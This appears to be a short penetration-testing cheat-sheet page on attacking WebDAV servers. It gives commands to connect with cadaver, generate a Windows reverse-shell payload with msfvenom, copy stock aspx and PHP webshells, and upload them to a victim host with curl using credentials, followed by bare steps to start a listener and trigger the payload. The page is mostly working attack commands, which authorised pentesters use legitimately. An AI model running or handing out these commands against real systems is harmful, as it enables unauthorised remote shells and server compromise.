WebDAV
1) Connection
cadaver http://domain.local/webdav2) Exploitation
1. Generate a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=80 -f aspx -o shell.aspxcp /usr/share/webshells/aspx/cmdasp.aspx .cp /usr/share/webshells/php/php-reverse-shell.php .2. Upload payload via WebDAV
curl -T 'shell.aspx' 'http://$VictimIP/' -u <username>:<password>put shell.aspx
put php-reverse-shell.php3. Start the listener
4. Trigger the payload
3) WebDAV credentials file location
PreviousVoice over IP Penetration TestingNextExtensible Messaging and Presence Protocol XMPP (Jabber) Penetration Testing
Last updated